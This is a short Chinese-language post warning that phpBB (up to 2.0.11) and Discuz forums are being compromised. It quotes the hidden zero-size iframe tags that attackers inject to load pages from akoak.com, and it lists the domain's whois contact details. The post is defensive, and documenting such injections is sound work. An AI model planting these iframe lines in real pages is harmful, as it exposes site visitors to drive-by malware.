phpBB 由 2.x 開始至 2.0.11 開始有漏洞,這個漏洞可話是一個不小的漏洞來。
這個漏洞可以令病毒由 phpBB 中進入伺服器,然後大事破壞。由於網主沒有更新 phpBB 程式,所以到處都可以看到有很多的討論區都被破壞。
由簡單的加入 html 程式碼,雖然不是什麼破壞,不過都會令網頁版面轉變。
可以按以下的連結看看有幾多個討論區被破壞:
http://www.google.com.hk/search?hl=zh-TW&q=%22akoak.%2Bcom%22&meta=
在我瀏灠時發覺破壞的不止是 phpBB,而 Discuz 都發現。
我想無論是那一個討論區程式,都需要盡早更新程式。
被入侵的討論區會被加上:
<iframe src=http://www.akoak.com/tm/ban.htm width=0 height=0></iframe>或
<iframe src=http://www.akoak.com/mf/1.htm width=0 height=0></iframe>解決方法
1. 立即更新討論區程式
2. 刪除有關 akoak.com 的連結。
估計
根據 whois akoak.com 得出的結果:
akoak.com 是在 http://www.bizcn.com 中申請的。
Billing Contact:
pid pig awjju@hotmail.com
131313113131313 fax: 131313113131313
ChengDu
ChengDu Sichuan 361004
cn
作者應該是中國人。
